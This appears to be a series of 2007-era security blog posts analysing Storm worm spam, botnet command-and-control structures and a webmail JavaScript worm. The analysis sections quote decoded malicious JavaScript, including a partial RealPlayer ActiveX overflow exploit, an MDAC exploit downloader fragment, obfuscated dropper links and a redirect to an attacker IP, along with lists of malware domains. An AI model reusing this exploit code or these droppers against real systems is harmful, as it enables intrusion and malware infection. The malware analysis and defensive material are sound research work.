Botnet Distributed Command and Control. (DC&C)

Over the past four years we've seen a large number of law enforcement, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented/new protocols and distributed control structures. As law enforcement arrests more offenders, we see more of them using TOR, or their own botnets to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use to identify botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large scale botnets still exist today, however the operators are wisely breaking these networks up into many smaller networks - or using peer to peer communication. Since the networks are spread out, its harder to eliminate the threat of one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recent as two years ago, we've started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, who perform the stated action. This provides the botnet operator a layer of protection. Now the experienced researchers or law enforcement must find the smaller net, to identify the botnet operator. This is time consuming work, and with out the cooperation of ISP's, its hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than it is one with less than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sale portions of his bot. One chunk can be used for spam, while another may perform better in Denial of service type activities.

Another example of distributed structure is the P2P scenario, where the botnet operator issues a command, which is passed to a number of supernodes, whom then pass it to the single peers.

Mapping peer to peer and other types of DC&C's are still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I wont highlight how researchers are doing this mapping, simply because we need to weigh teaching public (including bad-guys) and keeping an ace up our sleeves. I'm hoping this post will spark many closed door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain site. Using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of, because of the mistakes they make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune - they disable UDP outbound.

The number of infected machines would increase dramatically if the used a connection model similar to Skype.

So back to hiding in plain sight - What would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them, while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blogger or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply http requests wrapped in a pretty new interface (XML) bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The request would look like legitimate RSS traffic and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement though, certainly more willing than some ISP's.

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if its recommended by your neighborhood computer genius (highschool student) - do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a Sandboxer for programs that access the internet. SandboxIE is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your pc off when not in use. Even if your machine is infected, the damage it can do would be limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OSx has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted back to sending IP's in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click hereto launch the download
and then press Run

The link is a javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That javascript translates to withlove.exe -- Additionally there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your snort signatures.

Additionally we're tracking a phish using stormworm fastflux nodes with the domain ibank-halifax.com.

New Year, Recycled Greeting Cards

The storm authors have made up for their lack of creativity by registering a bunch of domains and quickly changing the filename. Additionally a false name has been added as a comment to the html source:

Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );

The javascript actually reads:

<a href="happynewyear2008.exe">

This was probably done in an attempt to identify automated scripts that parse the page for links, then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):

newyearcards2008.com
happycards2008.com
uhavepostcard.com
merrychristmasdude.com
newyearwithlove.com
familypostcards2008.com
freshcards2008.com
hellosanta2008.com
happy2008toyou.com
happysantacards.com
hohoho2008.com

serving the following files:

happynewyear2008.exe
happy_2008.exe
sony.exe

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!

We just received a handful of these in our mail drops. Looks like the grinch still runs storm.

Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);

So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...

function startANI()
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = 'iframe src="?o2&p=595022058&r=2792316769" height="1" width="1"'
      return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);

...snip...

The ANI looks fun:

From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]

Once ran in the Sandbox, %windir%/disnisa.exe is the binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)

The silent Storm and Javascript Decoding

Its been awhile since I've posted anything. I haven't lost touch, I've just been busy with the upcoming Holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet, in favor of laying low for a few months, and releasing a whole new version of the code, one with less bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write up here. In fact Daniel sparked my interest in decoding malicious javascript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic Javascript Decoder, which you can freely download and use. It is coded with an eye towards the unix flavor of OS, but should work fine if you have SpiderMonkey installed for windows, and don't mind modifying the code slightly. Jsdecode a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application. Therefore, SpiderMonkey must be installed before this script will work.

Most of the malicious Javascript can be decoded by simply running it through this script. So far I've only had a handful of malicious javascripts requiring more advanced thought. The script isn't magic. It just creates a document.write function for you, and modifies eval statements so they print to the screen, and reruns the decoded javascript to make sure its just not double encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)

QuickTime and RealPlayer Exploits

We're seeing lots of reports about Quicktime and RealPlayer exploits in the wild. Other security vendors are privately reporting an excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded Javascript. Of course users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....
(removed some content)
.....

PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade the their third party applications. Please remember to apply all security patches for those as frequently (or more so) than Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded Javascript. It decodes to:

<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

That site opened by the Javascript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…

function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}

…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempts to hide their exploit in layered javascript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.

Javascript Webmail Exploit

We recently received an interesting exploit that has the potential of creating an ample amount of grief for both ISPs and their customers. The code is spread using webmail providers who do not properly filter javascript in the body of HTML emails.

Our sample came from one of our readers with the notes:

I went to view the message to see what was up and it was addressed to someone other than me, had a subject line of "In the office" and had what appeared to be a blank body. However after a few seconds it showed "Loading body of message" or something similar and tried to push me to a link ijk.cc /E /ani / ani1.htm which McAfee Site Advisor blocked as harmful.
.....my traditional signature that I've always had was changed to "Troy Ball", so I freaked! I checked all the settings and found that only my signature line info was changed. What's scary is that I did nothing but view the email in webmail to start the chain of events.

This exploit does not show much in the way of original thought from the criminal element. It is, in fact, the all to often standard malicious Javascript on a compromised host leveraging a Microsoft active X control and new variant of an old Trojan backdoor to generate a ton of spam. Naturally, that should raise the question as to what, exactly then, are the interesting parts of this attack.

The very lack of innovation in this attack is interesting in that it demonstrates how confoundedly easy it is for bad people to prey on weaker people. The actual code in the attack is rather mundane and we will provide a description of what the code is doing later. It is interesting to see, however, that the malicious code behind the Javascript portion of this code has had some exposure to advanced programming techniques and demonstrates a certain amount of maturity in coding style. Of course, the coder attempted to hide their code behind format and variable name mangling as-well-as string encoding. None of these obfuscation approaches present much of a challenge in this particular code. Perhaps the coder was not trying all that hard to cover their tracks. In fact, the coder left an apparent remnant of their testing domain embedded in the code although that may just be just another attempt to cover their tracks.

That said, Pogo's "We have met the enemy and he is us!" slogan comes immediately to mind. Once again, people need to be reminded that JavaScript and ActiveX content just isn't safe. Unfortunately, past performance indicates user education only has value under certain conditions so we will continue to see such problems.

On to the JavaScript! The script has several areas worthy of remark. It sets and checks a cookie which is used to determine if mail is to be sent via web mail or from a mail application on the a.ijk.cc test domain.

The script also uses the ActiveX MSXML2.XMLHTTP or Microsoft.XMLHTTP control to stream mail through the web mail interface tailored to those of various ISPs limited to:

att
bellsouth
comcast
cox
earthlink.net
excite
mail.com
netzero
optonline
peoplepc
rr.com
verizon

Spam from the exploit appears to use one of the following mail titles:

JUST FOR YOU, That gray suit, cell phone, 11 Sep, Need help, Amazing illusion, good point, saludos, Cause you're my girl, Kid lost, Boss Is Always Right, our schedule, nice, funny shit, work vs prison, how are you, great news, my new contacts, change, resume, :), ;), Too FUNNY Humans, pls, don't forget, hola comrados, Help, question, Could You Drive Over This Bridge?, quick question, a friend, Women, alive or not?, BTW, WTF, why not?, our car, pickup, Working with idiots, Annoying Coworkers, Hi y Bye, maybe?, how are you, Love it!, Good illustration, Fun pics, spiderman :), Cute video, Age test, red bull, Cute Survey, in the office

In addition to the above target ISPs domains, the spam will attempt to appear to be from one of 211 other domains:

@2die4.com, @accountant.com, @activist.com, @adexec.com, @africamail.com, @allergist.com, @alumni.com, @alumnidirector.com, @americamail.com, @amorous.com, @angelic.com, @archaeologist.com, @arcticmail.com, @aroma.com, @artlover.com, @asia-mail.com, @asia.com, @atheist.com, @australiamail.com, @bartender.net, @been-there.com, @berlin.com, @bigger.com, @bikerider.com, @birdlover.com, @brazilmail.com, @brew-master.com, @californiamail.com, @caress.com, @catlover.com, @cheerful.com, @chef.net, @chemist.com, @chinamail.com, @clerk.com, @cliffhanger.com, @collector.org, @columnist.com, @comfortable.com, @comic.com, @consultant.com, @contractor.net, @counsellor.com, @count.com, @couple.com, @cutey.com, @cyber-wizard.com, @cyberdude.com, @cybergal.com, @dallasmail.com, @delhimail.com, @deliveryman.com, @diplomats.com, @disciples.com, @disposable.com, @doctor.com, @doglover.com, @doubt.com, @dr.com, @dublin.com, @dutchmail.com, @earthling.net, @elvisfan.com, @email.com, @engineer.com, @englandmail.com, @europe.com, @europemail.com, @execs.com, @fan.com, @feelings.com, @financier.com, @fireman.net, @footballer.com, @gardener.com, @geologist.com, @germanymail.com, @graduate.org, @graphic-designer.com, @gte.net, @hairdresser.net, @hilarious.com, @hockeymail.com, @homosexual.net, @hot-shot.com, @hour.com, @howling.com, @humanoid.net, @iname.com, @indiamail.com, @innocent.com, @inorbit.com, @instruction.com, @instructor.net, @insurer.com, @irelandmail.com, @israelmail.com, @italymail.com, @japan.com, @journalist.com, @koreamail.com, @lawyer.com, @legislator.com, @lobbyist.com, @london.com, @loveable.com, @mad.scientist.com, @madonnafan.com, @madrid.com, @mail.com, @mail.org, @mexicomail.com, @mindless.com, @minister.com, @mobsters.com, @monarchy.com, @moscowmail.com, @munich.com, @musician.org, @muslim.com, @myself.com, @nastything.com, @nightly.com, @nonpartisan.com, @null.net, @nycmail.com, @oath.com, @optician.com, @orthodontist.net, @orthodox.com, @pacific-ocean.com, @pacificwest.com, @paris.com, @pediatrician.com, @petlover.com, @photographer.net, @physicist.net, @playful.com, @poetic.com, @polandmail.com, @politician.com, @popstar.com, @post.com, @presidency.com, @priest.com, @programmer.net, @protestant.com, @publicist.com, @radiologist.net, @realtyagent.com, @reborn.com, @reggaefan.com, @registerednurses.com, @religious.com, @repairman.com, @representative.com, @rescueteam.com, @revenue.com, @rocketship.com, @rockfan.com, @rome.com, @royal.net, @rr.com, @russiamail.com, @safrica.com, @saintly.com, @salesperson.net, @samerica.com, @sanfranmail.com, @scientist.com, @scotlandmail.com, @secretary.net, @seductive.com, @singapore.com, @sister.com, @sizzling.com, @snakebite.com, @socialworker.net, @sociologist.com, @songwriter.net, @soon.com, @space-info.com, @spainmail.com, @surgical.net, @swedenmail.com, @swissmail.com, @teachers.org, @techie.com, @technologist.com, @tempting.com, @thegame.com, @theplate.com, @therapist.net, @toke.com, @tokyo.com, @toothfairy.com, @torontomail.com, @tough.com, @tvstar.com, @umpire.com, @usa.com, @wallet.com, @webname.com, @weirdness.com, @who.net, @whoever.com, @winning.com, @witty.com, @worker.com, @writeme.com, @yours.com

The exploit also uses several user IDs as the sender, such as postmaster, but there is only so much reading a list agony that one should have to go through.

Antivirus detection of the malware dll is minimal with only Ikarus, Microsoft and Panda identifying the file as potentially malicious.

Antivirus Version Last Update Result
AhnLab-V3 2007.10.31.0 2007.10.30 -
AntiVir 7.6.0.30 2007.10.30 -
Authentium 4.93.8 2007.10.30 -
Avast 4.7.1074.0 2007.10.30 -
AVG 7.5.0.503 2007.10.30 -
BitDefender 7.2 2007.10.30 -
CAT-QuickHeal 9.00 2007.10.30 -
ClamAV 0.91.2 2007.10.30 -
DrWeb 4.44.0.09170 2007.10.30 -
eSafe 7.0.15.0 2007.10.28 -
eTrust-Vet 31.2.5253 2007.10.30 -
Ewido 4.0 2007.10.30 -
FileAdvisor 1 2007.10.30 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.3.2.48 2007.10.30 -
F-Secure 6.70.13030.0 2007.10.30 -
Ikarus T3.1.1.12 2007.10.30 Backdoor.Win32.Agent.aiy
Kaspersky 7.0.0.125 2007.10.30 -
McAfee 5152 2007.10.30 -
Microsoft 1.2908 2007.10.30 Backdoor:Win32/Agent.ACE
NOD32v2 2627 2007.10.30 -
Norman 5.80.02 2007.10.30 -
Panda 9.0.0.4 2007.10.30 Suspicious file

Backdoor.Win32.Agent.aiy/Agent.ACE has been around for some time so the lack of detection of the accompanying DLL is likely due to the use of a variant of an existing backdoor.

(Post and analysis provided by Randy V)

Mitigation:
Disable or restrict Javascript. I use the NoScript plugin for Mozilla. If you use one of the webmail providers listed above, consider switching to text only emails, or using pop3 and disabling HTML tags in your client.

If you believe you've been infected, scan your PC with a name brand anti-virus scanner, like BitDefender, Kaspersky, or Trendmicro.